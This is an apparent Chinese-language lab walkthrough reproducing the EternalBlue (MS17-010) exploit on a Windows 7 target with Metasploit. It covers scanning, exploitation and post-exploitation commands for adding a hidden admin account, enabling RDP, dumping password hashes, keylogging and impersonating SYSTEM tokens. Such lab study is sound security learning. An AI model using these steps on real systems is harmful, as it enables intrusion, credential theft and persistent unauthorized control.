Win7经典漏洞永恒之蓝复现

  • 环境
    • 信息收集
    • 确定漏洞
    • 渗透
    • 渗透成功后一些常用操作

环境

工具:metaspoilt

模拟攻击机ip:192.168.2.19

靶机ip:192.168.2.22

信息收集

扫描靶机端口及端口服务版本

nmap -sV 192.168.2.22

445端口开启且版本信息已经显示时windows7版本,永恒之蓝漏洞特征已非常明显

确定漏洞

启动metaspoilt
搜索ms17-010

search ms17-010


exploit/windows/smb/ms17_010_eternalblue 为攻击模块

auxiliary/scanner/smb/smb_ms17_010 为辅助模块可以扫描目标是否存在永恒之蓝漏洞

进行漏洞扫描

use auxiliary/scanner/smb/smb_ms17_010

查看参数

show options

![在这里插入
RHOSTS参数是必填项,参数为目标ip

set RHOSTS 192.168.2.22

运行

exploit

运行结果

确定有永恒之蓝漏洞

渗透

使用ms17-010攻击模块

use exploit/windows/smb/ms17_010_eternalblue

查看参数

show options

主要参数有

RHOSTS:目标主机ip

LHOST:攻击者ip (程序检测到网卡的ip已自动填写)

LPORT:攻击接收端口(默认为4444,可根据需要更改)

set RHOSTS 192.168.2.22

开始渗透

exploit

渗透成功

渗透成功后一些常用操作

通过Shell对靶机Win7进行控制
创建用户名密码
net user hack 123456 /add
将用户hack添加入管理组
net localgroup administrators hack /add
开启远程桌面功能
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal” “Server /v fDenyTSConnections /t REG_DWORD /d 0 /f
Kali远程桌面连接Win7
rdesktop 192.168.2.22

shell交互显示乱码是因为编码不同

chcp 65001

修改编码可解决

获取到session后的常用命令:

help #获取所有可用命令

getuid #获取当前权限

screenshot #截屏

hashdump #获取密码的hash

ps #获取进程列表

sysinfo #获取系统信息

route #获取路由表

getpid #获取当前攻入的进程pid

migrate #将当前后门注入迁移到其他程序

keyscan_start # 开启键盘记录

keyscan_dump #显示键盘记录 使用永恒之蓝攻入的session默认不能进行键盘记录 ,如果迁移到其他程序就可以做,比如notepad.exe

download/upload #上传下载文件

keyscan_stop # 监视键盘记录

bg # 回到metasploit界面

令牌操纵
use incognito #heip incognito 查看帮助

list_tokens -u 查看可用的token

impersonate_token “伪造的身份” #假冒token 或者

举个例子:impersonate_token NT AUTHORITY\SYSTEM #不加单引号 需使用
execute -f cmd.exe -i –t # -t 使用假冒的token 执行 或者直接shell

Win7经典漏洞永恒之蓝复现相关推荐

  1. 利用虚拟机复现漏洞 “永恒之蓝”

    利用虚拟机复现漏洞"永恒之蓝" 攻击:kali Linux 2020.3 靶机:Windows Server 2008 R2 x64 下面详细讲述测试的过程. -- -- &quo ...

  2. Metasploit渗透框架介绍及永恒之蓝复现

    Metasploit渗透框架介绍及永恒之蓝复现 一.Metasploit渗透框架介绍 1.1 名词解释 1.2 MSF简介 1.3 MSF框架结构 1.4 MSF命令汇总 1.4.1 常用命令 1.4 ...

  3. 网络安全-MS17-010漏洞-永恒之蓝

    网络安全-MS17-010漏洞-永恒之蓝 这个东西怎么说呢,无论是干网络的没干网络的,估计每个人都听说过这个叫做永恒之蓝的东西 这个东东当时可谓是红极一时,现在也有点热度 这个漏洞呢,在win10是不 ...

  4. win7系统smb永恒之蓝【漏洞复现】

    介绍 永恒之蓝(Eternal Blue)是一种利用windows的系统的SMB协议漏洞来获取系统最高权限,从而达到入侵计算机目地的漏洞,于2017年4月14日晚,黑客团体Shadow Brokers ...

  5. linux 会不会受到永恒之蓝漏洞,永恒之蓝漏洞复现(ms17-010)

    永恒之蓝漏洞复现(ms17-010) 漏洞描述: Eternalblue通过TCP端口445和139来利用SMBv1和NBT中的远程代码执行漏洞,恶意代码会扫描开放445文件共享端口的Windows机 ...

  6. MS17-010 漏洞永恒之蓝445漏洞复现

    前言 这里使用kali中的Metasploit 主要利用445端口的漏洞 首先需要一台win7作为目标靶机 (不只是win7可以) 启用Metasploit mfsconsole 1.查找漏洞模块 s ...

  7. 经典利用永恒之蓝漏洞对Windows操作系统进行攻击

    利用永恒之蓝对Windows进行攻击 环境搭建:kali.Windows server 2008R2.Windows 7,其中Windows server 2008R2\WIN7为靶机. 首先简单介绍 ...

  8. MSF-17010(永恒之蓝)复现

    最近开始学习渗透,永恒之蓝漏洞很出名对此学习记录并且复现 所需环境VMware,两台主机使用NAT模式连接 kali 192.168.249.129 windows7 192.168.249.130 ...

  9. 服务器漏洞--永恒之蓝

    漏洞问题的简单分析 前言:不扫不知道,一扫吓一跳,原来服务器存在这么多安全隐患:看到这些,可谓祖国江山一片红,下面是解决思路和方式 图中可以发现三类漏洞,服务漏洞,数据库漏洞,服务器本身漏洞. 1.服 ...

最新文章

  1. vscode 终端 进入node_安装了Node.js 从VScode 使用node -v 和 npm -v等命令却无效
  2. excel排名_WPS-Excel表格实用技巧——排位排名函数(RANK函数)的使用
  3. jsonwebtoken中文文档
  4. Angular 如何根据一个 class 的定义和数据,动态创建一个该类的实例
  5. 二叉树的相关题(叶子结点个数,最大深度,找特殊值结点(值不重复),判断两个树是否相同,判断两个数是否为镜像树,是否为子树,)
  6. php表格tr,jQuery+ajax实现动态添加表格tr td功能示例
  7. [css] 举例说明BFC会与float元素相互覆盖吗?为什么?
  8. 使用Sublime Text 3做Python开发
  9. AI产品,如何做好从零到一
  10. 微信公众开放平台开发04---百度BAE,java应用部署服务器,jetty了解
  11. 【C++ 与 STL】映射:map
  12. c md5加密 和java不一样_C#的MD5加密为什么和JAVA的加密出来的结果不一样?
  13. 帮你躲坑:pip install tensorflow 报错怎么办,import tensorflow 报错怎么办?
  14. [PHP开发必备] -- 小巧强悍的MYSQL-Front中文版使用教程,附最新版下载地址
  15. python+selenium常见坑
  16. window10华硕计算机主板VT,华硕电脑主板开启VT虚拟化方法详解
  17. 郭天祥的10天学会51单片机_第十一节
  18. Python图像处理丨认识图像锐化和边缘提取的4个算子
  19. laypage分页java例子_总结laypage.js分页插件用法
  20. 苹果vpn是下一件大事

热门文章

  1. 怎么获取商品sku信息api接口
  2. html下拉框onchange事件,JQuery动态修改select标签的内容,并绑定onchange事件,弹出选择的值...
  3. html博客图文设计,设计基本功!帮你掌握图文排版的5个小技巧—UI博客精选
  4. 点滴力量 共创美好生活
  5. 江苏省工业互联网标识创新应用案例集
  6. eclipse启动Tomcat服务器
  7. 泗阳中学2021高考成绩查询,江苏泗阳中学2021年排名
  8. elementui-Tabs 标签页固定高度内容超出高度可滚动
  9. miui相机位置服务器,[盘点MIUI的那些神功能] 开启“MIUI相机”实验室功能
  10. Android AOSP LatinIME输入法自定义图片按钮